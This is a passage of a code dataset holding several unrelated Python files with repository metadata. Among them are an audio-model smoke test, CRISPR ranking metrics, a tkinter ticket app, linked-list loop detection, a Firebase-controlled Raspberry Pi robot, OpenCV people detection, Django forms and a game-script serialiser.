0.131,\n 'embedding_std': 0.238,\n 'post_pca_mean': 123.0,\n 'post_pca_std': 75.0\n }\n return x, sample_rate, expected_stats\n\n\n@torch.no_grad()\ndef test_embeddings():\n model = vggish(with_classifier=False, pretrained=True)\n model.cuda()\n\n x, sample_rate, expected_stats = gen_test_input()\n x = torch.from_numpy(x).reshape(1, -1).float() # [C, L]\n # note that default torch processing differs a little bit from tf processing\n # to pass the original smoke test use the tf processing\n x = waveform_to_input(x, sample_rate, method='tf')\n x = x.cuda()\n\n embeddings = model(x)\n embeddings = embeddings.cpu().numpy()\n\n mean, std = np.mean(embeddings), np.std(embeddings)\n print('expected mean {} vs actual mean {}'.format(\n expected_stats['embedding_mean'], mean)\n )\n print('expected std {} vs actual std {}'.format(\n expected_stats['embedding_std'], std)\n )\n\n\nif __name__ == '__main__':\n test_embeddings()\n","repo_name":"w-hc/vggish","sub_path":"tests/smoke_test.py","file_name":"smoke_test.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"38833105275","text":"import math\r\nimport pandas as pd\r\nfrom scipy import stats\r\n\r\n\r\ndef spearman_ds(ds, actual_col, pred_col, p_value=False, nan_policy='omit'):\r\n '''\r\n Calculate Spearman correlation coefficient between actual and predicted efficiencies.\r\n By default, omits NaN values and outputs only the coefficient without the corresponding p-value.\r\n\r\n :parameter ds: dataset to analyse.\r\n :parameter actual_col: # position of column with actual efficiencies e.g. 2nd column -> 2.\r\n :parameter pred_col: # position of column with each model's predictions.\r\n :parameter p_value: If True, calculate the two-sided p-value for a hypothesis test whose null hypothesis is that two sets of data are uncorrelated.\r\n :parameter nan_policy: Defines how to handle when input contains nan. The following options are available (default is 'omit'):\r\n 'propagate': returns nan, 'raise': throws an error, 'omit': performs the calculations ignoring nan values.\r\n :return: Spearman correlation coefficient (or a tuple of Spearman correlation coefficient and corresponding p-value).\r\n '''\r\n\r\n Spearman, pval = stats.spearmanr(\r\n ds.iloc[:, actual_col - 1], ds.iloc[:, pred_col - 1], nan_policy=nan_policy)\r\n if p_value == False:\r\n return Spearman\r\n else:\r\n return Spearman, pval\r\n\r\n\r\ndef ndcg_at_k(ds, k, actual_col, pred_col, bins=False, reverse=False, multiple=False):\r\n \"\"\"\r\n Calculate nDCG@k score using logarithmic discount given a dataset with actual and predicted efficiencies.\r\n The relevance value of each gRNA is its efficacy score.\r\n\r\n :parameter ds: dataset to analyse.\r\n :parameter k: highest value to calculate nDCG i.e. only consider the highest k scores in the ranking.\r\n :parameter actual_col: # position of column with actual efficiencies e.g. 
2nd column -> 2.\r\n :parameter pred_col: # position of column with each model's predictions.\r\n :parameter bins (default=False): If True, group actual efficiencies into 5 equal width bins to have a discrete relevance value.\r\n By default, use actual efficiency as the relevance value.\r\n :parameter reverse (default=False): If True, calculate nDCG for reverse ordering to be used as a baseline.\r\n :parameter multiple (default=False): If True, calculate and store nDCG together with samples' indices for plotting.\r\n :return: nDCG@k score (or a list of scores and indices if parameter multiple is True).\r\n \"\"\"\r\n\r\n # Discrete relevance value\r\n\r\n if bins == True:\r\n quantile_list = [0.0, 0.20, 0.40, 0.60, 0.80, 1.0]\r\n bins = ds.iloc[:, actual_col-1].quantile(quantile_list)\r\n labels = [0, 1, 2, 3, 4]\r\n ds['binned'] = pd.cut(ds.iloc[:, actual_col-1],\r\n bins, labels=labels, include_lowest=True)\r\n\r\n # Reverse ordering (worst case)\r\n if reverse == True:\r\n ds_sort = ds.sort_values(by=ds.columns[actual_col-1])\r\n y_pred = ds_sort['binned'].values\r\n\r\n # Ordering based on each model's predictions\r\n else:\r\n ds_sort = ds.sort_values(\r\n by=ds.columns[pred_col-1], ascending=False)\r\n y_pred = ds_sort['binned'].values\r\n\r\n # Actual relevance value\r\n\r\n else:\r\n\r\n # Reverse ordering (worst case)\r\n if reverse == True:\r\n ds_sort = ds.sort_values(by=ds.columns[actual_col-1])\r\n y_pred = ds_sort.iloc[:, actual_col-1].values\r\n\r\n # Ordering based on each model's predictions\r\n else:\r\n ds_sort = ds.sort_values(\r\n by=ds.columns[pred_col-1], ascending=False)\r\n y_pred = ds_sort.iloc[:, actual_col-1].values\r\n\r\n # Ideal ordering\r\n Y_test = sorted(y_pred, reverse=True)\r\n\r\n # Calculate nDCG@k\r\n\r\n thr = []\r\n score = []\r\n\r\n a = b = 0\r\n for i in range(0, k):\r\n a += y_pred[i]/math.log2(i+2)\r\n b += Y_test[i] / math.log2(i + 2)\r\n thr.append(i)\r\n if not b:\r\n score.append(0)\r\n else:\r\n score.append(a/b)\r\n\r\n if multiple == True:\r\n return score, thr\r\n else:\r\n return score[-1]\r\n","repo_name":"VKonstantakos/CRISPR-Deep-Learning","sub_path":"Scripts/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"22729038167","text":"import string\r\n\r\nimport datetime\r\nOctubre = datetime.date.today().strftime('%B')\r\n\r\nconjunto_A = set(Octubre)\r\n\r\nconjunto_B = set(string.ascii_lowercase[:10])\r\n\r\ninterseccion = conjunto_A.intersection(conjunto_B)\r\n\r\nprint(\"Conjunto A:\", conjunto_A)\r\nprint(\"Conjunto B:\", conjunto_B)\r\nprint(\"Intersección de A y B:\", interseccion)\r\n\r\n","repo_name":"MarcoBarrientos/Tarea.-Proyecto-Final---Matem-ticaDiscreta","sub_path":"segundo.py","file_name":"segundo.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3606979554","text":"num = int(input())\nss = set()\n\nfor _ in range(num):\n direction, car_number = input().split(', ')\n\n if direction == 'IN':\n ss.add(car_number)\n else:\n ss.remove(car_number)\n\n\nif len(ss) > 0:\n for car in ss:\n print(car)\n\nelse:\n print('Parking Lot is Empty')\n\n","repo_name":"Velin-Todorov/SoftUni","sub_path":"Sets and tuples/parking lot.py","file_name":"parking lot.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} 
+{"seq_id":"330938906","text":"# Kai kurias bibliotekas importuoju priskirdamas kažkokiam kintamajam\n# tai darau tam, jog daryti \" from BIBLIOTEKA import * \" nėra gera praktika\nimport tkinter.tix as tkx\nfrom tkinter import font as tkfont\nimport utils.Constants as const\nfrom database.stores.HallStore import HallStore\nfrom database.stores.PurchaseStore import PurchaseStore\nfrom database.stores.SeatStore import SeatStore\nfrom database.stores.UserStore import UserStore\nfrom utils.Auth import Auth\nfrom windows.Home import Home\nfrom windows.Login import Login\n\n\n# Klasė Application paveldi informaciją iš klasės Tk\nclass Application(tkx.Tk):\n # Pagrindinis elementas programoje yra pasirinkta salė esanti duomenų bazeje\n # kadangi be jos nebus galimybės nuskaityti salės sėdimų vietų, vartotojo pirkimų ir kitų dalykų\n # Salės ID saugau kaip globalų kintamąjį, kuris bus prieinamas kitoms klasėms (frames)\n currentHallId = None\n\n # Konstruktorius\n def __init__(self, *args, **kwargs):\n # Tėvinės klasės konstruktorius\n tkx.Tk.__init__(self, *args, *kwargs)\n\n # Programoje naudojami font'ai\n self.welcome_msg_font = tkfont.Font(family='Helvetica', size=12, slant=\"italic\")\n self.secondaryFont = tkfont.Font(family='Helvetica', size=11, slant=\"italic\")\n\n # Pagrindinis langas sukuriamas kaip ScrolledWindow\n # tai suteikia galimybę elementams neįsitenkant lange uždėti langui Scrollbars\n sw = tkx.ScrolledWindow(self, scrollbar=tkx.AUTO)\n sw.pack(fill=tkx.BOTH, expand=1)\n self.minsize(const.MIN_WIDTH, const.MIN_HEIGHT)\n container = tkx.Frame(sw.window)\n\n # Sukuriamas vartotojo objektas aplikacijoje\n self._auth = Auth()\n\n # Nedarau paveldejimo is klases HallStore ir kitu, o kuriu nauja objekta Tai darau tam, jog duomenims is duomenu\n # bazes gauti yra imituojamas Repository pattern'as, kuriam reikalingas objektas\n # objektai sukuriami viena vieninteli nepakartojama karta\n self._hallStore = HallStore()\n self._seatStore = SeatStore()\n self._userStore = UserStore()\n self._purchaseStore = PurchaseStore()\n\n # Frames/langų dictionary\n self._frames = {}\n\n # Šiuo metu aplikacijoje esantis langas\n self._selected = None\n\n container.pack(side=\"top\", fill=\"both\", expand=True)\n\n self.container = container\n\n # Frames(Windows) objektu sukurimas\n # objektai sukuriami viena vieninteli nepakartojama karta\n self._frames[const.WINDOW_HOME] = Home(auth=self._auth, parent=container, controller=self,\n hallStore=self._hallStore,\n seatStore=self._seatStore, purchaseStore=self._purchaseStore)\n self._frames[const.WINDOW_LOGIN] = Login(auth=self._auth, parent=container, controller=self,\n userStore=self._userStore)\n\n # Pradinis aplikacijos langas\n self.switch_frame(const.WINDOW_HOME)\n\n def switch_frame(self, window_name):\n \"\"\"Destroys current frame and replaces it with a new one.\"\"\"\n\n # Jeigu jau egzistuoja bent vienas langas, jis, t.y. 
Frame, yra sunaikinamas\n if self._selected is not None:\n self._selected.pack_forget()\n self._selected.grid_forget()\n\n self._selected = self._frames[window_name]\n self._selected.refresh()\n self._selected.pack()\n\n # instance of an object check\n '''print(\"-------------------------\")\n for obj in gc.get_objects():\n if isinstance(obj, Home) or isinstance(obj, Login) or isinstance(obj, HallStore) or isinstance(obj,\n UserStore) or isinstance(\n obj, SeatStore) or isinstance(\n obj, Hall) or isinstance(\n obj, User) or isinstance(\n obj, Purchase):\n print(obj)'''\n\n\nif __name__ == '__main__':\n # Application objekto sukurimas\n app = Application()\n app.mainloop()\n","repo_name":"GdonatasG/tickets-tkinter-LD4","sub_path":"Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"lt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24378148172","text":"\"\"\"\n CREATED BY: Benjamin Hamlin\n Chapter 2 Question 8\n \"Loop Detection\"\n PROMPT:\n Given a linked list which might contain a loop, implement and algorithm that\n returns the node at the beginning of the loop (if one exists)\n DATE: 12/9/2019\n\"\"\"\n\nimport unittest\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n def dispose(self):\n del self\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def dispose(self):\n if self.head is not None:\n temp = self.head\n self.head = self.head.next\n temp.dispose()\n # self.dispose()\n\n# at this time I am unable to determine the time complexity without more studying\ndef p8(list):\n \"\"\"cur1 = list.head.next\n cur2 = list.head.next\n head = list.head\n while head is not cur1 and head is not cur2:\n while cur1 is not cur2:\n cur1 = cur1.next\n cur2 = cur2.next.next\n head = head.next\n cur1 = head.next\n cur2 = head.next\n #print(head.data)\n #print(cur1.data)\n #print(cur2.data)\n if head is cur1 or head is cur2:\n return head\n else:\n return None\n NOTE: INCORRECT\n Research found floyd's tortoise and hare algorithm\n implemented below\n \"\"\"\n t = list.head.next\n h = list.head.next.next\n while t is not h:\n t = t.next\n h = h.next.next\n\n mu = 0\n t = list.head\n while t is not h:\n t = t.next\n h = h.next\n mu += 1\n return t\n\n \"\"\"\n # rest of floyd's algorithm unnecessary\n lam = 1\n h = t.next\n while t is not h:\n h = h.next\n lam += 1\n \"\"\"\n\nclass TestP8(unittest.TestCase):\n def setUp(self):\n self.list = LinkedList()\n\n def tearDown(self):\n self.list.dispose()\n self.list = None\n\n def test_p8(self):\n self.list.head = Node('A')\n self.list.head.next = Node('B')\n C = Node('C')\n self.list.head.next.next = C\n C.next = Node('D')\n C.next.next = Node('E')\n C.next.next.next = C\n\n self.assertEqual(p8(self.list).data, C.data)\n","repo_name":"benhamlin314/CrackingCoding","sub_path":"python/ch2/p8.py","file_name":"p8.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29292081405","text":"# Source: Fluent Python, Luciano Ramalho, page 150\n\n\ndef tag(name: str, *content: tuple, cls: str = None, **attrs: dict) -> str:\n \"\"\"\n Creates HTML/XML tags.\n\n :param name: the name of the tag (without the brackets)\n :param content: the (text) content to wrap. If more than one\n positional argument is given, each content is wrapped as\n a tag with the tag name \"name\".\n :param cls: An optional \"class\" attribute. 
Defaults to None.\n :return: the representation of the tag as string with all attributes\n the attributes inside the start tag are sorted.\n\n >>> tag(\"br\")\n '<br />'\n >>> tag(\"p\", \"Hello\")\n '<p>Hello</p>'\n >>> tag(\"p\", \"hello\", id=33)\n '<p id=\"33\">hello</p>'\n >>> tag(\"p\", \"Hello\", \"World\")\n '<p>Hello</p>\\\\n<p>World</p>
'\n >>> tag(\"img\", title=\"Sunset\", src=\"sunset.jpg\", cls=\"framed\")\n ''\n \"\"\"\n if cls is not None:\n attrs[\"class\"] = cls\n if attrs:\n attr_str = \"\".join(\n f' {attr}=\"{value}\"' for attr, value in sorted(attrs.items())\n )\n else:\n attr_str = \"\"\n if content:\n element = f\"<{name}{attr_str}>%s\"\n return \"\\n\".join(element % c for c in content)\n else:\n return f\"<{name}{attr_str} />\"\n","repo_name":"tomschr/python-course-public-cloud","sub_path":"topic-func/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15497438541","text":"# Import Libraries\nfrom Robot import Motor, Kinematics, Trajectory, Measure # Custom libraries made for the system\nimport RPi.GPIO as GPIO # Importing raspberry pi libraries\nimport time # Other common libraries\nimport sys, termios, tty\nimport pyrebase # Firebase libraries\n\nGPIO.cleanup() # Resets all Raspberry Pi GPIO pin to zero or ground\n\n\n# The below function allows the system to interact with the user and take details of the item to be transferred and\n# utilizes the custom libraries to plan a path and execute it\ndef Deploy_Robot():\n # Firebase config allows the code to know where to upload the data\n config = {\n \"apiKey\": \"AIzaSyCZ-Wx5K-Q0F-jad2Q-LxjE2zstLjVslWk\",\n \"authDomain\": \"robot-control-c1e61\",\n \"databaseURL\": \"https://robot-control-c1e61-default-rtdb.firebaseio.com/Robot%20Control\",\n \"storageBucket\": \"robot-control-c1e61.appspot.com\"\n }\n firebase = pyrebase.initialize_app(config) # initializing the firebase variable\n\n # Function to get user input\n def getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n print('\\033c') # clear terminal\n\n GPIO.setmode(GPIO.BOARD) # initializing the Raspberry Pi GPIO pin nomenclature\n GPIO.setwarnings(False) # Disables unwanted warnings\n\n # initializing local variables\n interval = 0.01\n\n # initializing Motors (3 No.s)\n M1 = Motor(\"M1\", 11, 13, 33, 38, 40, 450, 0.038)\n M2 = Motor(\"M2\", 22, 24, 35, 8, 10, 695, 0.038)\n M3 = Motor(\"M3\", 29, 31, 37, 16, 18, 695, 0.038)\n\n # initializing motor params and functions to help run and retrieve data\n M1.Motor_setup()\n M2.Motor_setup()\n M3.Motor_setup()\n\n M1.edge_detect()\n M2.edge_detect()\n M3.edge_detect()\n\n M1.Motor_pwm()\n M2.Motor_pwm()\n M3.Motor_pwm()\n\n # Stops motors from rotating unnecessarily\n M1.STOP_pwm()\n M2.STOP_pwm()\n M3.STOP_pwm()\n\n beta = Kinematics(0.019, 0.052) # initializing robot kinematic params\n\n # Loop to continuously check for user input\n while True:\n beta.qr_scan() # printing function\n db = firebase.database() # initialize firebase database variable\n char = '\"Rack 1\"' # db.child(\"Rack\").get().val() # retrieving data from firebase\n\n # Checking if data matches\n if char == '\"Rack 1\"':\n beta_trajectory = Trajectory([0, 0], [0, 1], 0.05, 0.1) # Location details of Rack 1 along with other\n # robot param\n\n # custom library functions used for planning the path and trajectory\n beta_trajectory.elu_dist()\n beta_trajectory.planner()\n beta_trajectory.traj_print()\n\n beta_measure = Measure() # initializing variable for storing sensor data\n\n # resetting count to remove any garbage values\n M1.count_reset()\n M2.count_reset()\n M3.count_reset()\n\n 
start_time = round(time.time(), 2) # initializing params to track program time\n\n while True:\n\n t = round(time.time(), 2) - start_time # Calculating elapsed program time\n\n if t <= beta_trajectory.max_time + 0.5: # Checking elapsed robot run time\n\n # Custom library functions used for converting sensor values to real world values\n M1.Motor_run()\n M2.Motor_run()\n M3.Motor_run()\n\n # Code snippet that selects data produced by the trajectory planner and supplies to the robot drive\n # functions at a particular interval\n try:\n i = int(round(t / beta_trajectory.sample_time, 0)) # Indexing\n\n # Applying the retrieved values into the robot kinematic function\n beta.ikine(beta_trajectory.robot_vel[i][0], beta_trajectory.robot_vel[i][1],\n beta_trajectory.robot_vel[i][2])\n\n # Storing important data retrieved from the sensors onboard the robot\n beta_measure.time_data(beta_trajectory.tarr[i])\n beta_measure.robot_vel_in_data(beta_trajectory.robot_vel[i][0], beta_trajectory.robot_vel[i][1])\n beta_measure.encoder_data(M1.count, M2.count, M3.count)\n beta_measure.motor_vel_in_data(beta.w1, beta.w2, beta.w3)\n beta_measure.motor_vel_out_data(M1.vel, M2.vel, M3.vel)\n beta_measure.robot_vel_out_data(beta.Vx, beta.Vy)\n except IndexError: # Added exception to rule out any unexpected errors\n i = 0\n\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm() # pwm publisher\n\n # running motors according to the values received from the pwm publisher\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n\n # Velocity calculation\n M1.Vel(t, interval)\n M2.Vel(t, interval)\n M3.Vel(t, interval)\n\n # Localization or forward kinematics\n beta.fkine(M1.vel, M2.vel, M3.vel)\n\n # custom printing functions for debugging\n M1.data_print(t, 1)\n M2.data_print(t, 2)\n M3.data_print(t, 3)\n beta.kine_print()\n beta_trajectory.traj_print()\n time.sleep(interval)\n\n else: # once the execution of the path is completed the robot stops\n M1.STOP_pwm()\n M2.STOP_pwm()\n M3.STOP_pwm()\n\n # Data received is represented as plots for better visualization\n beta.wait()\n beta_measure.data_logger()\n beta_measure.save_plots()\n beta.end_print()\n\n # User confirmation for exiting the routine\n while True:\n char = getch()\n if char == \"p\":\n beta.robot_stop()\n GPIO.cleanup()\n exit(0)\n\n\n# The below function allows the user to manually control the robot using a custom-made joystick app\ndef Teleop():\n config = {\n \"apiKey\": \"AIzaSyCZ-Wx5K-Q0F-jad2Q-LxjE2zstLjVslWk\",\n \"authDomain\": \"robot-control-c1e61\",\n \"databaseURL\": \"https://robot-control-c1e61-default-rtdb.firebaseio.com/Robot%20Control\",\n \"storageBucket\": \"robot-control-c1e61.appspot.com\"\n }\n\n firebase = pyrebase.initialize_app(config)\n\n GPIO.setmode(GPIO.BOARD)\n GPIO.setwarnings(False)\n\n M1 = Motor(\"M1\", 11, 13, 33, 38, 40, 860, 0.038) # IN1 IN2 PWM ENA ENB CPR DIA\n M2 = Motor(\"M2\", 22, 24, 35, 8, 10, 860, 0.038)\n M3 = Motor(\"M3\", 29, 31, 37, 16, 18, 850, 0.038)\n\n beta = Kinematics(0.038, 0.080)\n beta.robot_stop()\n\n M1.Motor_setup()\n M2.Motor_setup()\n M3.Motor_setup()\n\n M1.edge_detect()\n M2.edge_detect()\n M3.edge_detect()\n\n M1.Motor_pwm()\n M2.Motor_pwm()\n M3.Motor_pwm()\n\n M1.STOP_pwm()\n M2.STOP_pwm()\n M3.STOP_pwm()\n\n button_delay = 0.001\n\n print('Teleop Started') # Code start conformation\n\n while True:\n db = firebase.database()\n char = db.child(\"Direction\").get().val()\n print(\"%s\" % char)\n\n # Code to check the user input and select code to run the robot in the 
user-selected direction\n if char == 'p':\n print(\"Stop!\")\n M1.STOP_pwm()\n M2.STOP_pwm()\n M3.STOP_pwm()\n exit(0)\n\n if char == '\"a\"':\n print(\"Left pressed\")\n beta.ikine(-0.25, 0, 0)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"d\"':\n print(\"Right pressed\")\n beta.ikine(0.25, 0, 0)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"e\"':\n print(\"Right pressed\")\n beta.ikine(0, 0, -1.2)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"q\"':\n print(\"clockwise rotation\")\n beta.ikine(0, 0, 1.2)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"w\"':\n print(\"Forward\")\n beta.ikine(0, 0.25, 0)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"s\"':\n print(\"Down pressed\")\n beta.ikine(0, -0.25, 0)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"f\"':\n print(\"Stop pressed\")\n M1.STOP_pwm()\n M2.STOP_pwm()\n M3.STOP_pwm()\n time.sleep(button_delay)\n\n# End of main functions\n\n# Main function selector\n# config = {\n# \"apiKey\": \"AIzaSyCZ-Wx5K-Q0F-jad2Q-LxjE2zstLjVslWk\",\n# \"authDomain\": \"robot-control-c1e61\",\n# \"databaseURL\": \"https://robot-control-c1e61-default-rtdb.firebaseio.com/Robot%20Control\",\n# \"storageBucket\": \"robot-control-c1e61.appspot.com\"\n# }\n#\n# firebase = pyrebase.initialize_app(config)\n# print('Firebase Started')\n# while True:\n#\n# db = firebase.database()\n# DR = db.child(\"Deploy Robots\").get().val()\n# MC = db.child(\"Manual Controller\").get().val()\n#\n# # below code selects and runs main function that the user has selected\n# if DR == '\"Enabled\"':\n# print('Deploy Robots Enabled')\nDeploy_Robot()\n# elif MC == '\"Enabled\"':\n# print('Manual Controller Enabled ')\n# Teleop()\n","repo_name":"Collaborative-AMRs/Software-Stack","sub_path":"Beta.py","file_name":"Beta.py","file_ext":"py","file_size_in_byte":10778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40581970991","text":"# import the necessary packages\nimport numpy as np\nimport cv2\nimport pyrealsense2 as rs\n\n\nW = 640\nH = 480\nFPS = 30\n\n# Configure depth and color streams\npipeline = rs.pipeline()\nconfig = rs.config()\nconfig.enable_stream(rs.stream.color, W, H, rs.format.bgr8, FPS)\n\nprint(\"[INFO] Starting streaming...\")\npipeline.start(config)\nprint(\"[INFO] Camera ready.\")\n\n# initialize the HOG descriptor/person detector\nhog = cv2.HOGDescriptor()\nhog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\nprint(\"[INFO] Detector ready.\")\n\n# cv2.startWindowThread()\n\n# open webcam video stream\n# cap = cv2.VideoCapture(0)\n\n# the output will be written to output.avi\nout = cv2.VideoWriter(\n 'output/output.avi',\n cv2.VideoWriter_fourcc(*'MJPG'),\n 15.,\n (640,480))\n\nwhile(True):\n # Capture frame-by-frame\n frames = 
pipeline.wait_for_frames()\n color_frame = frames.get_color_frame()\n frame = np.asanyarray(color_frame.get_data())\n\n # resizing for faster detection\n frame = cv2.resize(frame, (W, H))\n # using a greyscale picture, also for faster detection\n gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n\n # detect people in the image\n # returns the bounding boxes for the detected objects\n boxes, weights = hog.detectMultiScale(frame, winStride=(4,4), scale=1.15, useMeanshiftGrouping=False)\n\n boxes = np.array([[x, y, x + w, y + h] for (x, y, w, h) in boxes])\n\n for (xA, yA, xB, yB) in boxes:\n # display the detected boxes in the colour picture\n cv2.rectangle(frame, (xA, yA), (xB, yB),\n (0, 255, 0), 2)\n \n # Write the output video \n out.write(frame.astype('uint8'))\n # Display the resulting frame\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n print(\"[INFO] FPS: \", rs.frame_metadata_value.actual_fps.value)\n\n\n# When everything done, release the capture\n# cap.release()\n# and release the output\nout.release()\n# finally, close the window\ncv2.destroyAllWindows()\ncv2.waitKey(1)","repo_name":"Vojtech1025/RS_Physio","sub_path":"detection/bodyparts.py","file_name":"bodyparts.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44333348210","text":"from django import forms\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.forms import ModelForm\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .models import DreamReal, Author, Book\n\n\nclass LoginForm(forms.Form):\n user = forms.CharField(max_length=30)\n password = forms.CharField(widget=forms.PasswordInput())\n\n def clean_message(self):\n username = self.cleaned_data.get(\"username\")\n dbuser = DreamReal.objects.filter(name=username)\n\n if not dbuser:\n raise forms.ValidationError(\"User Does not Exist\")\n return username\n\n\nclass ProfileForm(forms.Form):\n name = forms.CharField(max_length=100)\n picture = forms.ImageField()\n\n\nclass ContactForm(forms.Form):\n contact_name = forms.CharField(required=True)\n contact_email = forms.EmailField(required=True)\n content = forms.CharField(\n required=True,\n widget=forms.Textarea\n )\n\n # some extra (optional)\n def __init__(self, *args, **kwargs):\n super(ContactForm, self).__init__(*args, **kwargs)\n self.fields['contact_name'].label = \"Your Name\"\n self.fields['contact_email'].label = \"Your email:\"\n self.fields['content'].label = \"What do you want to say?\"\n\n\nclass AuthorForm(ModelForm):\n class Meta:\n model = Author\n fields = ['title', 'name', 'birth_date']\n widgets = {\n 'name': forms.TextInput(attrs={'placeholder': 'Username'}),\n 'birth_date': forms.TextInput(attrs={'placeholder': 'YYYY-MM-DD'}),\n }\n labels = {\n 'name': _('Writer'),\n }\n help_texts = dict(name=_('Enter Author Name')) # dict literal as dict constructor\n error_messages = {'name': {\n 'max_length': _(\"This writer's name is too long\") # Dict constructor as dict literal\n }}\n\n\nclass BookForm(ModelForm):\n class Meta:\n model = Book\n fields = ['name', 'authors']\n\nclass LoginForm(AuthenticationForm):\n username = forms.CharField(label=\"Username\", max_length=30,\n widget=forms.TextInput(attrs={'class': 'form-control', 'name': 'username'}))\n password = forms.CharField(label=\"Password\", max_length=30,\n widget=forms.TextInput(attrs={'class': 'form-control', 'name': 'password'}))\n\nTITLE_CHOICES = (\n ('MR', 'Mr.'),\n ('MRS', 
'Mrs.'),\n ('MS', 'Ms.'),\n)\n\n\nclass AuthorForm2(forms.Form):\n name = forms.CharField(max_length=100)\n title = forms.CharField(max_length=3,\n widget=forms.Select(choices=TITLE_CHOICES), )\n birth_date = forms.DateField(required=False)\n\n\nclass BookForm2(forms.Form):\n name = forms.CharField(max_length=100)\n authors = forms.ModelMultipleChoiceField(queryset=Author.objects.all())\n","repo_name":"learndjangodb/dreams","sub_path":"myapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16043774849","text":"from Falcom.Common import *\nfrom . import utils\n\nclass ScenaTypeBase:\n DESCRIPTOR: Tuple[str, str] = None\n\n def __init__(self, *, fs: fileio.FileStream = None, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n if fs:\n self.deserialize(fs)\n\n def toPython(self) -> List[str]:\n if not self.DESCRIPTOR:\n raise NotImplementedError\n\n align = max([len(e[0]) for e in self.DESCRIPTOR])\n align = (align + 4) & ~3\n\n lines = [\n f'{self.__class__.__name__}(',\n ]\n\n formatter = {\n 'C' : lambda v: f'{v}',\n 'B' : lambda v: f'0x{v:02X}',\n 'H' : lambda v: f'{v}',\n 'W' : lambda v: f'0x{v:04X}',\n 'i' : lambda v: f'{v}',\n 'I' : lambda v: f'{v}',\n 'L' : lambda v: f'0x{v:08X}',\n 'f' : lambda v: f'{v:g}.0' if f'{v:g}'.count('.') == 0 else f'{v:g}',\n 'S' : lambda v: f\"{repr(v)}\",\n 'r' : lambda v: f\"{repr(v)}\",\n }\n\n for name, type in self.DESCRIPTOR:\n type = type.split(':', maxsplit = 1)[0]\n value = getattr(self, name)\n lines.append(f'{GlobalConfig.DefaultIndent}{name.ljust(align)}= {formatter[type](value)},')\n\n lines.append(')')\n\n return lines\n\n def serialize(self) -> bytes:\n if not self.DESCRIPTOR:\n raise NotImplementedError\n\n writer = {\n 'B' : lambda v: utils.int_to_bytes(v, 1),\n 'C' : lambda v: utils.int_to_bytes(v, 1),\n 'H' : lambda v: utils.int_to_bytes(v, 2),\n 'W' : lambda v: utils.int_to_bytes(v, 2),\n 'i' : lambda v: utils.int_to_bytes(v, 4),\n 'I' : lambda v: utils.int_to_bytes(v, 4),\n 'I' : lambda v: utils.int_to_bytes(v, 4),\n 'L' : lambda v: utils.int_to_bytes(v, 4),\n 'f' : lambda v: utils.float_to_bytes(v),\n 'S' : lambda v: utils.str_to_bytes(v),\n 'r' : lambda v: b'',\n }\n\n body = bytearray()\n\n for name, type in self.DESCRIPTOR:\n if name.startswith('_'):\n continue\n\n body.extend(writer[type](getattr(self, 